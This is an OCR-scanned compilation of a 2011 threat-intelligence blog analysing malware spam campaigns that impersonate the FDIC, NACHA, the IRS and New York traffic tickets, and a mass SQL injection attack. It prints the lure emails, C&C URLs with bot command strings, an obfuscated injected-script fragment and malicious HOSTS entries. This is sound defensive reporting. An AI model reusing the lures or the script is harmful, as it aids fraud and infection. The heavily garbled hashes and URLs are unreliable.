ttp://www.zdnet.com/blog/security/kaspersky- 12-different-vulnerabilities-detected-on-every-pc/928 


ttp://www.zdnet .com/blog/security/spamvertised-uniform-traffic-tickets-and-invoices-lead-to-malware/9289 


ttp://www.zdnet.com/blog/security/latest-version-of-skype-susceptible-to-malicious-code-injection-flaw/9 


ttp://www.zdnet.com/blog/security/spamvertised-scan-from-a-xerox-workcentre-pro-leads-to-malware/931 


10. http://www.zdnet.com/blog/security/malware-watch-fdic-and-western-union-themed-emails-lead-to-malware/9 
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7.9.3 Spamvertised ’Uniform Traffic Ticket’ and ’FDIC Notifications’ Serving Malware 
- Historical OSINT (2011-09-28 14:43) 


The following intelligence brief will summarize the findings from a brief analysis performed on 
two malware campaigns from August, namely, the [1]spamvertised Uniform Traffic Tickets 
and the [2]FDIC Notification. 


* Uniform traffic ticket From: “automaller -095° <automailler.-095@nyc.gov> 
3 Subject: Uniform traffic ticket 
From: “automailer -095° <automailer.-095@nyc.gov> 
To: 
Date: 2011-08-17 05:03:29 


New York State — Department of Motor Vehicles 
UNIFORM TRAFFIC TICKET 


POLICE AGENCY 


NEW YORK STATE POLICE 
Local Police Code 


THE PERSON DESCRIBED ABOVE IS CHARGED AS FOLLOWS 
Time Date of Offense IN VIOLATION OF 


7:25 AM 07/05/2011 NYS V AND T LAW 


Deseription of Violation 
SPEED OVER 55 ZONE 


TO PLEAD, PRINT OUT THE ENCLOSED TICKET AND SEND IT TO TOWN COURT, 
CHATAM HALL., PO BOX 117 
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_Uniform Traffic Tickets 
Spamvertised attachments - Ticket-728-2011.zip; Ticket-064-211.zip; Ticket-728-2011.zip 


Detection rates: 

Ticket.exe - [3]Gen:Trojan.Heur.FU.bqW@ak9Qebrii - Detection rate: 37/43 (86.0 %) 

MD5 : 6361d4a40485345c18473f3c6b4b6609 

SHA1 : 50b09bb2e0044aa139a84c2e445a56f01d70c185 

SHA256: ca67al4bfed2a7bc2ac8be9c01cb17d5da1l2b75320b4bad4fe8d8a6759ad9725 


Ticket1l.exe - [4]Trojan-Downloader.Win32.Small.ccxz - Detection rate: 36/44 (81.8 %) 
MD5 : e2a2d67b8a52ae655f92779bec296676 

SHA1 : ed3df72b4e073ffba7174ebc8cb77b2b7d012cbf 

SHA256: 50b104c5f8314327e03b01e7f7c2535d8de7cd9f7 3f8e16d1364c7fd021a90cc 


Upon execution the samples phone back to: 
sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (responding to the same IP is also survey- 
providers.info) - AS51630 - Email: admin@sdkjgndfjnf.ru 


rattsillis.com/ftp/g.php — - 195.189.226.109; 178.208.77.247; 195.189.226.107; 
195.189.226.108 - AS41018 - Email: admin@jokelimo.com 
rattsillis.com/pusk3.exe — - 195.189.226.109; 178.208.77.247; 195.189.226.107; 


195.189.226.108 - AS41018 - Email: admin@jokelimo.com 


DNS emulation of nsl.lemanbrostm.info reveals two domains belidiskalom.com_ - 
178.208.76.175 - Email: admin@belidiskalom.com and lemanbrostm.info - Email: 
coz@yahoo.com using the same name server. 


Known MD5 modifications for pusk3.exe at rattsillis.com: 
c6dab856705b5dfd09b2adbe10701b05 
f167213c6a79f2313995e80a8ac29939 
f4764cce5c3795b1d63a299a5329d2e2 
dae9e7653573478a6b41a62f7cb99C12 
69c983c9dfaf37e346004c9aaf54a3d0 
d875b8e32a231405c7fa96b810e9b361 
628270c6e44b0fa21ef8e87c6bc36f57 
9b69dabd876e967bcd2eb85465175e3b 
0434c084dba8626df980c7974d5728el 


Related binaries and associated MD5 modifications: 


rattsillis.com/blood.exe - MD5: 23795cb9b2f5e1 9effOdfOcf2fba9247; 
82b6f18b130alfOcelce928d0980fab0 

rattsillis.com/pusk.exe - MD5: 55d8e25bc373a98c5c29284c989953ab; 
368c86556e827d898f043a4d5f378fa0; 7411d0d29db91f2625ee36d438eb6ac4; 
3ea4e9fd297b3058ebbb360c1581aaac; 

rattsillis.com/pusk2.exe - MD5: dae9e7653573478a6b41a62F7cb99c12; 


b73705c097c9be9779730d801ad098e0; d7952cle77d7bb250cdfa88e157fb5a8 
Known MD5 modifications for pusk3.exe at sdkjgndfjnf.ru: 8672f021e7705b6a8132b/7dfc21617cf 


sdkjgndfjnf.ru/blood.exe - MD5: 577cf0b7ca3d5bcbe35764024f241fa8; 
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ebf7278a7239378e7d70d426779962ce 
sdkjgndfjnf.ru/pusk2.exe - MD5: d9e36e25a3181f574fd5d520cb501d3a 
sdkjgndfjnf.ru/pusk.exe - MD5: fce04f7681283207d585561led91e77b4 


sdkjgndfjnf.ru/blood.exe - MD5: 577cf0b7ca3d5bcbe35764024f241fa8 


Detection rate for blood.exe: 

blood.exe - [5]Trojan-Spy.Win32.Zbot - 25/44 (56.8 %) 

MD5 : 577cf0b7ca3d5bcbe35764024f241fa8 

SHA1 : 30f542a44d06d9125cdfbdd38d79de778e4c0791 

SHA256: 1741ef5d24641ee99b5d78a68109162bebc714c3d19abc37e3d4472f3dcd6f18 


* FDIC notification From: “no reply” <no_reply@fdic.gov> 
= Subject: FDIC notification 

From: “no reply” <no.reply@fdic.gov> 

Date; 2011-08-30 02:23:03 


Dear customer, 

Your account ACH and WIRE transaction have been temporarily suspended for 
security reasons due to the expiration of your security version. To download and 
install the newest installations read the document(pdf) attached below. 


As soon as it is setup, you transaction abilities will be fully restored. 


ds, Online Security departament, Federa! Deposit Insurance Corporation 


_FDIC Notification 


Spamvertised attachments: FDIC Document.zip 


Detection rate: 
FDIC _Document.exe - 
Gen:Trojan.Heur.FU.bqW@a45Fklbi - 35/44 (79.5 %) 


MD5 : 7b5a271c58c6bb18d79cd48353127ff6 
SHALL : 6526b6097df42f93bee25d7ea73f95d2fcc24d3a 


SHA256: a09165c71a8dd2a1338b2bd0c92ae07495041ae15592e3432bd50600e6ef2af0 


Upon execution phones back to: 

rattsillis.com/ftp/g.php 

rattsillis.com/blood.exe 

rattsillis.com/blood.exe - MD5: 23795cb9b2f5e1 9effOdfOcf2fba9247; 
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82b6f18b130a1f0celce928d0980fab0 

What’s particularly interesting is the fact that both campaigns have been launched by 
the same cybercriminal, with the same C &C - rattsillis.com also seen in the [6]spamvertised 
ACH Payment Canceled campaign. 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him 
[8Jon Twitter. 


1. http: //www.zdnet .com/blog/security/spamvertised-uniform-traffic-tickets—and-invoices-lead-to-malware/9289 


2. http: //www.zdnet .com/blog/security/malware-watch-fdic-and-western-union-themed-emails-lead-to-malware/932 


3. http://www.virustotal.com/file-scan/report .html?id=ca67al4bfed2a7bc2ac8be9c01cb17d5da12b75320b4bad4f e8d8a 


4. 
5. 
6. http://labs .m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/ 

7. http: //ddanchev . blogspot . com/ 

B.htp://ewateer con/danchodanche 


7.9.4 Spamvertised ’Uniform Traffic Ticket’ and ’FDIC Notifications’ Serving Malware 
- Historical OSINT (2011-09-28 14:43) 


The following intelligence brief will summarize the findings from a brief analysis performed on 
two malware campaigns from August, namely, the [1]spamvertised Uniform Traffic Tickets 
and the [2]FDIC Notification. 
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> 


Uniform traffic ticket From: “automaller -095° <automailler.-095@nyc.gov> 
Subject: Uniform traffic ticket 
From: “automailer -095" <automailer.-095@nyc.gov> 
To: 
Date: 2011-08-17 05:03:29 


New York State — Department of Motor Vehicles 
UNIFORM TRAFFIC TICKET 


POLICE AGENCY 


NEW YORK STATE POLICE 


Local Police Code 

THE PERSON DESCRIBED ABOVE IS CHARGED AS FOLLOWS 
Time Date of Offense IN VIOLATION OF 
7:25 AM 07/05/2011 NYS V AND T LAW 


Deseription of Violation 
SPEED OVER 55 ZONE 


TO PLEAD, PRINT OUT THE ENCLOSED TICKET AND SEND IT TO TOWN COURT, 
CHATAM HALL., PO BOX 117 


_Uniform Traffic Tickets 


Spamvertised attachments - Ticket-728-2011.zip; Ticket-064-211.zip; Ticket-728-2011.zip 


Detection rates: 


Ticket.exe - [3]Gen:Trojan.Heur.FU.bqW@ak9Qebrii - Detection rate: 37/43 (86.0 %) 


MD5 : 6361d4a40485345c18473f3c6b4b6609 


SHA1 : 50b09bb2e0044aa139a84c2e445a56f01d70c185 


SHA256: ca67al4bfed2a7bc2ac8be9c01cb17d5dal2b75320b4bad4fe8d8a6759ad9725 


Ticketl.exe - [4]Trojan-Downloader.Win32.Small.ccxz - Detection rate: 36/44 (81.8 %) 


MD5 : e2a2d67b8a52ae655f92779bec296676 
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SHALL : ed3df72b4e073ffba7174ebc8cb77b2b7d012cbf 


SHA256: 50b104c5f8314327e03b01e7f7c2535d8de7cd9f73f8e16d1364c7fd021a90cc 


Upon execution the samples phone back to: 


sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (responding to the same IP is also survey- 
providers.info) - AS51630 - Email: admin@sdkjgndfjnf.ru 


rattsillis.com/ftp/g.php - 195.189.226.109; 178.208.77.247; 195.189.226.107; 
195.189.226.108 - AS41018 - Email: admin@jokelimo.com 


rattsillis.com/pusk3.exe - 195.189.226.109; 178.208.77.247; 195.189.226.107; 
195.189.226.108 - AS41018 - Email: admin@jokelimo.com 


DNS emulation of nsl.lemanbrostm.info reveals two domains belidiskalom.com_ - 
178.208.76.175 - Email: admin@belidiskalom.com and lemanbrostm.info - Email: 
coz@yahoo.com using the same name server. 


Known MD5 modifications for pusk3.exe at rattsillis.com: 
c6dab856705b5dfd09b2adbe10701b05 
f167213c6a79f2313995e80a8ac29939 
f4764cce5c3795b1d63a299a5329d2e2 
dae9e7653573478a6b41a62f7cb99c12 
69c983c9dfaf37e346004c9aaf54a3d0 
d875b8e32a231405c7fa96b810e9b361 
628270c6e44b0fa21ef8e87c6bc36f57 
9b69dabd876e967bcd2eb85465175e3b 


0434c084dba8626df980c7974d5728el1 


Related binaries and associated MD5 modifications: 


rattsillis.com/blood.exe - MDS: 23795cb9b2f5e19effOdfOcf2fba9247; 
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82b6f18b130alfOcelce928d0980fab0 

rattsillis.com/pusk.exe - MD5: 55d8e25bc373a98c5c29284c989953ab; 
368c86556e827d898f043a4d5f378fa0; 7411d0d29db91f2625ee36d438eb6ac4; 
3ea4e9fd297b3058ebbb360c1581aaac; 


rattsillis.com/pusk2.exe - MD5: dae9e7653573478a6b41a62f7cb99c12; 
b73705c097c9be9779730d801ad098e0; d7952c1e77d7bb250cdfa88e157fb5a8 


Known MD5 modifications for pusk3.exe at sdkjgndfjnf.ru: 8672f021e7705b6a8132b7dfc21617cf 


sdkjgndfjnf.ru/blood.exe - MD5: 577cf0b7ca3d5bcbe35764024f241fa8; 
ebf7278a7239378e7d70d426779962ce 


sdkjgndfjnf.ru/pusk2.exe - MD5: d9e36e25a3181f574fd5d520cb501d3a 


sdkjgndfjnf.ru/pusk.exe - MD5: fce04f7681283207d585561led91e77b4 


sdkjgndfjnf.ru/blood.exe - MD5: 577cf0b7ca3d5bcbe35764024f241fa8 


Detection rate for blood.exe: 

blood.exe - [5]Trojan-Spy.Win32.Zbot - 25/44 (56.8 %) 
MD5 : 577cf0b7ca3d5bcbe35764024f241fa8 

SHAI1 : 30f542a44d06d9125cdfbdd38d79de778e4c0791 


SHA256: 1741ef5d24641ee99b5d78a68109162bebc714c3d19abc37e3d4472f3dcd6f18 
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* FDIC notification From: “no reply” <no.reply@fdic. gov> 
i= Subject: FDIC notification 
From: “no reply” <no.reply@fdic.gov> 
| Date: 2011-08-30 02:23:03 


Dear customer, 

Your account ACH and WIRE transaction have been temporarily suspended for 
security reasons due to the expiration of your security version. To download and 
install the newest installations read the document(pdf) attached below. 


As soon as it is setup, you transaction abilities will be fully restored. 


5s, Online Security departament, Federa 


_FDIC Notification 


Spamvertised attachments: FDIC Document.zip 


Detection rate: 
FDIC _Document.exe - 
Gen:Trojan.Heur.FU.bqW@a45Fklbi - 35/44 (79.5 %) 


MD5 : 76b5a271c58c6bb18d79cd48353127ff6 


SHAIL1 : 6526b6097df42f93bee25d7ea73f95d2fcc24d3a 


SHA256: a09165c71a8dd2a1338b2bd0c92ae07495041ae15592e3432bd50600e6ef2af0 


Upon execution phones back to: 


rattsillis.com/ftp/g.php 


rattsillis.com/blood.exe 
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rattsillis.com/blood.exe - MDS: 23795cb9b2f5e1 9effOdfOcf2fba9247; 
82b6f18b130alfOcelce928d0980fab0 


What’s particularly interesting is the fact that both campaigns have been launched by 
the same cybercriminal, with the same C &C - rattsillis.com also seen in the [6]spamvertised 
ACH Payment Canceled campaign. 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him 
[8]on Twitter. 


ttp://www.zdnet .com/blog/security/spamvertised-uniform-traffic-tickets-and-invoices-lead-to-malware/9289 


ttp://www.zdnet .com/blog/security/malware-watch-fdic-and-western-union-themed-emails-lead-to-malware/932 


WIN 


ttp://www.virustotal.com/file-scan/report .html?id=ca67a14bfed2a7bc2ac8be9c01cb17d5dal2b75320b4bad4fe8d8a 


4. 
5. 
6. http://labs.m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/ 

7. htp:/ /adanchev. blogspot. con/ 

8. http: //twitter. com/danchodanchey 
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7.10 October 


7.10.1 Summarizing ZDNet’s Zero Day Posts for September (2011-10-04 14:37) 


Need s 


How to become a hacker 


Hackers using QR codes to push Android 


malware watch Samsung's Green Memory n, 


+s them to s ste that 


Faulty Microsoft AV update nukes Chrome 


SAMSUNG 
browser 


me browser from Windows machenes, martang it 35 3 v 


Survey: 60 percent of users use the same 


password across more than one of their online 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for September. You 
can subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 


01. [3]Spamvertised 'Facebook notification’ leads to exploits and malware 

02. [4]Google, Mozilla and Microsoft ban the DigiNotar Certificate Authority in their browsers 
03. [5]Microsoft themed ransomware variant spotted in the wild 

04. [6]’Man in wheelchair falls down the elevator shaft’ scam spreading on Facebook 

05. [7]New ransomware variant uses false child porn accusations 

06. [8]Russian Embassy in London hit by a DDoS attack 

07. [9JuTorrent.com hacked, serving scareware 
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08. [10]Bank of Melbourne Twitter account hacked, spreading phishing links 

09. [11]Malicious spam campaigns proliferating 

10. [12]Spamvertised ’We are going to sue you’ emails lead to malware 

11. [13]XSS bug in Skype for iPhone, iPad allows address book theft 

12. [14]Researcher releases details on 6 SCADA vulnerabilities 

13. [15]DIY botnet kit spotted in the wild 

14. [16]New Mac OS X trojan poses as malicious PDF file 

15. [17]Survey: 60 percent of users use the same password across more than one of their 
online accounts 


This post has been reproduced from [18]Dancho Danchev’s blog. Follow him 
[19]on Twitter. 


1. http://www.zdnet .com/topics/danchotdanchev?o0=1émode=rssktag=mantle_skin; content 


2. http://feeds .feedburner.com/zdnet/securit 


http: //www.zdnet .com/blog/security/bank-of-melbourne-twitter-account-hacked-spreading-phishing-links/94 


://www.zdnet .com/blog/security/malicious-spam-campaigns-proliferating/9420 
.com/blog/security/spamvertised-we-are-going-to-sue-you-emails-lead-to-malware/942 
.com/blog/security/xss-bug- in-skype-for-iphone-ipad-allows-address-book- theft /9426 
.com/blog/security/researcher-releases-details-on-6-scada-vulnerabilities/9432 
.com/blog/security/diy-botnet-kit-spotted-in-the-wild/9440 


://www.zdnet .com/blog/security/new-mac- os-x-trojan-poses-as-malicious-pdf-file/9486 


ttp://www.zdnet.com/blog/security/survey-60-percent- of-users-use-the- same-password-across-more-than-o 


e-of-their-online-accounts/9489 
18. http://ddanchev. blogspot .com/ 
19. http://twitter .com/danchodanche 


7.10.2 Spamvertised "NACHA security nitification" Serving Malware - Historical OS- 
INT (2011-10-04 14:38) 


Dear Valued Client, 

We strongly believe that your account may have been compromised. Due to this, we cancelled the last ACH transactions: 
-(ID: 13104924) 

-(ID: 04804768) 

~(I10: 37527025) 

~(ID: 51633547) 


initiated from your bank account by you or any other person, who might have access to your account. 


Detailed report on initiated transactions and reasons for cancellation can be found in the attachment. 
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The following intelligence brief will offer historical OSINT on the "NACHA security nitification" - 
the typo is intentionally left as this is how the original campaign was spamvertised - malware 
campaign. 


Spamvertised body: 

Dear Valued Client,We strongly believe that your account may have been compromised. 
Due to this, we cancelled the last ACH transactions:-(ID: 13104924)-(ID: 04804768)-(ID: 
37527025)-(ID: 51633547)initiated from your bank account by you or any other person, who 
might have access to your account.Detailed report on initiated transactions and reasons for 
cancellation can be found in the attachment. 

The ACH transaction (ID: 83612541), recently sent from your bank account (by you or any 
other person), was rejected by the Electronic Payments Association. 
HHHHHHHHHHHHFHRHRHRHRRHRHRHRHRFRHRHRHRRR RHR RHRHRRRREHREBAE 
HHHHHE 

Canceled transaction 

Transaction ID: 83612541 

Reason of rejection See details in the report below 

Transaction Report report _1409.pdf.zip (ZIP archive, Adobe PDF) 
HHHHHHHRHFHFHHHFHRHRHRHRRHRHPFHRHRPHRHRHRRRRHR RRR HRHRRRRE EEE 
HHHHHE 

13450 Sunrise Valley Drive, Suite 100 Herndon, VA 20171 (703) 561-1100 


2011 NACHA - The Electronic Payments Association 
Spamvertised attachments: report 1409.pdf.zip; Report-8764.zip 


Detection rate: 

Report-8764.exe - [1]Gen:Trojan.Heur.FU.bqW@amtJU@oi - 39/43 (90.7 %) 

MD5: 7c131fa05e01fc32d8f4efe53aa883d1 

SHAI1 : 14d52d76dd7ccc595554486027634bf8c9877036 

SHA256: 1ad11c1193f0dbcae3766e5cb4094acc137c10430d615e55470cbc41ce6cd03a 


Upon execution the sample phones back to: 

onemoretimehi.ru/piety.exe - 188.65.208.59; 178.208.91.192 - Email: ad- 
min@onemoretimehi.ru 

onemoretimehi.ru/ftp/g.php 


piety.exe - MD5: 4bd87ecc4423f0bc15e229ecbf33aa2c 
onemoretimehi.ru/tops.exe - MDB: f076dbc365ec7bfc438ad3c728702122; 
86c7489ac539a0b57a4d075e723075f0 


This post has been reproduced from [2]Dancho Danchev’s blog. Follow him 
[3]Jon Twitter. 


i 
2. heap: / /ddanchev. blogspot. con/ 
3, http: //twitter .com/danchodanchev 
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7.10.3 Spamvertised "IRS notice" Serving Malware (2011-10-09 19:53) 


Tax notice, 


There are arrears reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, enclosed. 


Sincerely, 
Internal Revenue Service. 


Cybercriminals are spamvertising yet another malware-serving campaign. Impersonating the 
IRS, malicious attackers are attempting to entice end users into downloading and executing a 
malicious file attachment. 


Spamvertised message: Tax notice, There are arrears reckoned on your account over a 
period of 2010-2011 year. You will find all calculations according to your financial debt, 
enclosed. Sincerely, Internal Revenue Service 


Detection rate: 

Calculations.exe - [1]TrojanDownloader:Win32/Dofoil.D - 33/43 (76.7 %) 

MD5 : 178bb562d9c0ef2b0a87467dcbd945ee 

SHA1 : 9ef75146aeb27102a1e5662284f369a43144225c 

SHA256: d1551934d60033c871b377015c8be65d608b33543f149369d1e70361e06dc05e 


Upon execution, it phones back to falcononfly2006.ru/blog/task.php?bid=2bfc680038ba2be7 
&os=5-1-2600 &uptime=0 &rnd=150156 


falcononfly2006.ru - 91.229.90.139, AS6753 - Email: makrogerhouse@yandex.ru 


makrogerhouse@yandex.ru is also associated with the following domains: 
diamondexchange2011.ru 
philippinemoney2011.ru 
Bedownloader2011.ru 
dolcekomarenoro2011.ru 
forsalga102.ru 
runescapegpge2011.ru 
yomwarayom2001.ru 
philippinemoney2011.ru 
moneymgmt2011.ru 
moneykeep2011.ru 
firewallmakeover.ru 
czechmoney2011.ru 
communityspace2911.ru 
brazilianmoney2011.ru 


Monitoring of the campaign is ongoing. 
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This post has been reproduced from [2]Dancho Danchev’s blog. Follow him 
[3]Jon Twitter. 


1 
2, http://adanchev blogspot con) 
3, http: //ewitter. con/danchodanched 


7.10.4 Spamvertised IRS-themed "Last Notice" Emails Serving Malware 
(2011-10-18 21:45) 


Notice. 


There are arrears reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, enclosed. 
You have to pay out the debt by the 17 December 2011. 


Yours sincerely, 
IRS. 


Cybercriminals are once again impersonating the Internal Revenue Service (IRS) for malware- 
serving purposes. In this intelligence brief, we’ll dissect the malware campaign. 


Spamvertised attachment: IRS Calculations _#ID6749.zip 

Spamvertised message: Notice, There are arrears reckoned on your account over a period of 
2010-2011 year. You will find all calculations according to your financial debt, enclosed. You 
have to pay out the debt by the 17 December 2011. Yours sincerely, IRS. 


- Detection rate: 

IRS _Calculations.exe - [1]W32/Yakes.B!tr - 34/40 (85.0 %) 

MD5 : e44eb03582f030d30251le6be384f6b32 

SHAI1 : eaa3d76534d247d04987b8950965d0142d770b29 

SHA256: 18386f49580298eee73688ce5e626a9e332886C25403a991495e0a3250c53e32 


Upon execution phones back to: 

bitgale.com/404.php?type=stats &affid=574 &subid=01 Giruns - 31.44.184.42; AS15884 - 
Email: davidsiddins@gxmailbox.com 

shbsharri.com/arkivi _files/574-01.exe - returns "Bandwidth Limit Exceeded" - 74.55.50.202; 
AS21844 - Email: contact@privacyprotect.org 

shbsharri.com/arkivi _files/setup.exe - returns "Bandwidth Limit Exceeded" 
shbsharri.com/arkivi _files/sl16.exe - returns "Bandwidth Limit Exceeded" 
shbsharri.com/arkivi _files/sssss.exe - returns "Bandwidth Limit Exceeded" 
gansgansgroup.ru/true/index.php?cmd=getgrab - Connect to 91.229.90.139 on port 80 ... 
failed 

gansgansgroup.ru/true/index.php?cmd=getproxy - Connect to 91.229.90.139 on port 80 ... 
failed 

gansgansgroup.ru/true/index.php?cmd=getload &login=4117AF14E694E469C &sel=donat 
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&ver=5.1 &bits=0 &file=1 &run=ok 
gansgansgroup.ru/true/index.php?cmd=getsocks &login=4117AF14E694E469C &port=11925 


gansgansgroup.ru - 91.229.90.139; AS6753 (responding to 91.229.90.139 is also falconon- 
fly2006.ru - Email: makrogerhouse@yandex.ru) - Email: gansgansgroup.ru@allperson.ru 


The same email makrogerhouse@yandex.ru, has been linked to a [2]previously spamvertised 
IRS-themed malware campaign. 


Clearly, both campaigns have been launched by the same cybercriminal. 


This post has been reproduced from [3]Dancho Danchev’s blog. Follow him 
[4]Jon Twitter. 


i; ttp://www.virustotal.com/file-scan/report .html?id=18386f 49580298eee73688ce5e626a9e332886c25403a991495e0a 


3250c53e32- 131896260 


2. http: //ddanchev. blogspot .com/2011/10/spamvertised-irs-notice-serving-malware.htm 


3. http://ddanchev.blogspot.com/ 
4. http://twitter .com/danchodanche 


7.10.5 Dissecting the Ongoing Mass SQL Injection Attack (2011-10-20 23:36) 


HTTP/1.1 200 OK 

Date: Wed, 19 Oct 2011 11:24:05 GMT 

Server: Apache/2.2. 19 (FreeBSO) DAV/2 PHP/S. 3.6 mod _gai/2.2. 19 OQpenSSi/0.9.8q 
Last Modified: Wed, 19 Oct 2011 11:20:03 GMT 

Elag: “2b 1436e-1da3-4afa50577 1ec0" 

Accept-Rianges: bytes 

Content-Length: 7592 

Commection: dose 

Content-Type: application jawascrint 

ver str=["78742", “78742", °7883S", “78843", °78327", "78843", “78843", "78764", “78793", "78764", “78771", "78336", “78848", "78348", *78844", °78790", “78779", “78779", “7885S 
var temp="; 


var age"; 

for (i=0; i<gty. length; i++){ 
ga=sirli) -78732; 

temp =temp +String. fromCharCode (aq); 
4 


cual(temp); 


The [1l]ongoing mass SQL injection attack, has already affected over a [2]million web sites. 
Cybercriminals performing [3]active search engines [4]reconnaissance have managed to 
inject a malicious script into ASP ASP.NET websites. 
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bookfulacom 


bookgusa.com 


bookvila.com 
bookzula.com : A ad 
146 NET : as 
aC 146,.185.248.3 146.185,248.0/24 AS43134 
“> lS 
a 
wwwfile-di.com 
CNAME 
file-di.com 
nbnjki.com 
nbnjkl.com 


From [5]client-side exploits to bogus Adobe Flash players, the campaign is active and ongoing. 
In this intelligence brief, we’ll dissect the campaign and establish a direct connection between 
the campaign and last March’s [6]Lizamoon mass SQL injection attack. 


SQL injected domains - thanks to Dasient’s Tufan Demir for the ping: 
nbnjki.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
jjghui.com/urchin.js - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
bookzula.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
bookgusa.com/ur.php - 146.185.248.3 - Email: jamesnorthone@hotmailbox.com 
dfrgcc.com/ur.php - Email: jamesnorthone@hotmailbox.com 

statsl.com/ur.php - 111.22.111.111 - Email: jamesnorthone@hotmailbox.com 
milapop.com/urphp - Email: jamesnorthone@hotmailbox.com 
jhgukn.com/ur.php - Email: jamesnorthone@hotmailbox.com 
vovmml.com/ur.php - Email: jamesnorthone@hotmailbox.com 
bookvivi.com/ur.php - Email: jamesnorthone@hotmailbox.com 


Responding to 146.185.248.3 is also file-dl.com; bookfula.com and bookvila.com - Email: 
jamesnorthone@hotmailbox.com 


Detection rate for urchin.js: 

urchin.js - [7]Trojan.JS.Redirector - 17/42 (40.5 %) 

MD5 : 4387f9be5af4087d21c4b44b969a870F 

SHA1 : 8a47842ccf6d642043ee8db99d0530336eef6b99 

SHA256: 975e62fe1d9415b9fa06e8f826F7 76ef851bd030c2c897bc3fbee207519f8351 


The redirections take place as follows: 


* bookzula.com/ur.php -> www3.topasarmy.in/?w4q593n= - Email: 
bill.swinson@yahoo.com -> firstrtscanerrr.nu 


¢ nbnjkl.com/urchin.js -> power-wfchecker.in/?1dlia916= - Email: bill.swinson@yahoo.com 
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bill.swinson@yahoo.com has also been used to register the following scareware-serving 


domains: 
uberble-safe.in 
uberate-safe.in 
best-jsentinel.in 
topantivir-foru.in 
personalscannerlg.in 
rideusfor.in 
hardbsy-network.in 
enablesecureum.in 
hardynaucheckerin 
best-jsentinel.in 
smartkihdefense.in 
smartaasecurity.in 
personal-scan-4u.in 
unieve-safe.in 
safe-solutionsoft.in 
hugeble-cure.in 
topsecuritykauu.in 
personalcleansoft.in 
powerscanercis.in 
topksfsecurity.in 
hard-antivirbjb.in 
strong-guardbxz.in 
smart-suiteguard.in 
thebestkrearmy.in 
smart-guardianro.in 
freeopenscanerpo.in 
best-networkqjo.in 
hard-antivirbjb.in 
smartantivir-scannerin 
most-popularsoftcontent.in 
bester-msecuriity.in 
doneahme.in 
strong-checkerwrt.in 
safepowerforu.in 
safe-securityarmy.in 
personal-bpsentinel.in 
personalcleansoft.in 
ostestsystemri.in 
saveinternet-guard.in 
just-perfectprotection.in 
firstholdermvq.in 
just-perfectprotection.in 
allcle-safe.in 
brawaidme.in 
uniind-safe.in 
moreaz-fine.in 
trueeox-safe.in 
safexanet.in 
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personal-internet-foryou.in 


Ff ADOBE® FLASH® PLAYER 


An update to your Abode Flash Player is available 
Flash Player enhances your Web browsing experience 
This update incteses: 

* Ful ecreen, NO video playback 

* Cinematic special effects mat bring Web expenences to Ife 


* Faster performance 


Updating takes under a minute on broadhamd no restart is required. 


([Download Now! || Oon'tinstat | 


For the time being, the campaing is redirecting to a fake YouTube page enticing users into 
downloading a bogus Adobe Flash player in order to view the video. 


Detection rate for the bogus Adobe Flash player: 

scandisk.exe - [8]Backdoor:Win32/Simda.A - 8/43 (18.6 %) 

MD5 : fb4c93935346d2d8605598535528506e 

SHA1 : Off7ccd785c0582e33c22f9b21156929ba7abaeb 

SHA256: b204586cbac1606637361dd788b691f342cb1c582d10690209a989b040dab632 


Upon execution the sample phones back to: 
209.212.147.141/chrome/report.html 
98.142.243.64/chrome/report.html 
update.19runs10q3.com - 65.98.83.115 


The same phone back locations have been used in a variety of related malware - thanks to 
Kaspersky’s David Jacoby for the ping. For instance, in [9]this malware sample that’s also 
phoning back to the same URLs, we have active HOSTS file modification as follows: 


See related post: [10] Sampling Malicious Activity Inside Cybercrime-Friendly Search Engines 


www.google.com. =87.125.87.99; 
google.com.=87.125.87.103; 
google.com.au.=87.125.87.104; 
www.google.com. au. =87.125.87.147; 
google. be.=77.125.87.148; 
www.google.be.=77.125.87.149; 
google.com.br.=77.125.87.109; 
www.google.com.br.=77.125.87.150; 
google.ca.=77.125.87.152; 
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www.google.ca.=77.125.87.153; 
google.ch.=77.125.87.155; 
www.google.ch.=77.125.87.158; 
google.de.=77.125.87.160; 
www.google.de.=77.125.87.161; 
google.dk.=92.125.87.123; 
www.google.dk.=92.125.87.160; 
google. fr.=92.125.87.154; 
www.google.fr.=92.125.87.134; 
google.ie.=92.125.87.170; 
www.google.ie.=92.125.87.177; 
google.it.=92.125.87.173; 
www.google.it.=92.125.87.147; 
google.co.jp.=92.125.87.103; 
www.google.co.jp.=84.125.87.147; 
google.nl.=84.125.87.103; 
www.google.nl.=84.125.87.147; 
google.no.=84.125.87.103; 
www.google.no.=84.125.87.147; 
google.co.nz.=84.125.87.103; 
www.google.co.nz.=84.125.87.147; 
google.pl.=84.125.87.103; 
www.google.pl.=64.125.87.147; 
google.se.=64.125.87.103; 
www.google.se.=64.125.87.147; 
google.co.uk.=64.125.87.103; 
www.google.co.uk.=64.125.87.147; 
google.co.za.=64.125.87.103; 
www.google.co.za.=64.125.87.147; 
www.google-analytics.com.=64.125.87.101; 
www.bing.com.=92.123.68.97; 
search.yahoo.com.=72.30.186.249; 
www.search.yahoo.com.=72.30.186.249; 
uk.search.yahoo.com.=87.248.112.8; 
ca.search.yahoo.com.=100.6.239.84; 
de.search. yahoo.com. =87.248.112.8; 
fr.search.yahoo.com. =87.248.112.8; 
au.search. yahoo.com. =87.248.112.8; 
ad-emea.doubleclick.net.=64.125.87.101; 
www.statcounter.com.=64.125.87.101; 


[11] The Lizamoon mass SQL injection connection 
The same email used to register the SQL injected domains jamesnorthone@hotmailbox.com 
has been used to register the Lizamoon mass SQL injection attack domains extensively profiled 


here - "[12]Dissecting the Massive SQL Injection Attack Serving Scareware". 


Related posts: 


3823 


¢ [13]SQL Injection Through Search Engines Reconnaissance 

¢ [14]Massive SQL Injections Through Search Engine’s Reconnaissance - Part Two 
¢ [15]Massive SQL Injection Attacks - the Chinese Way 

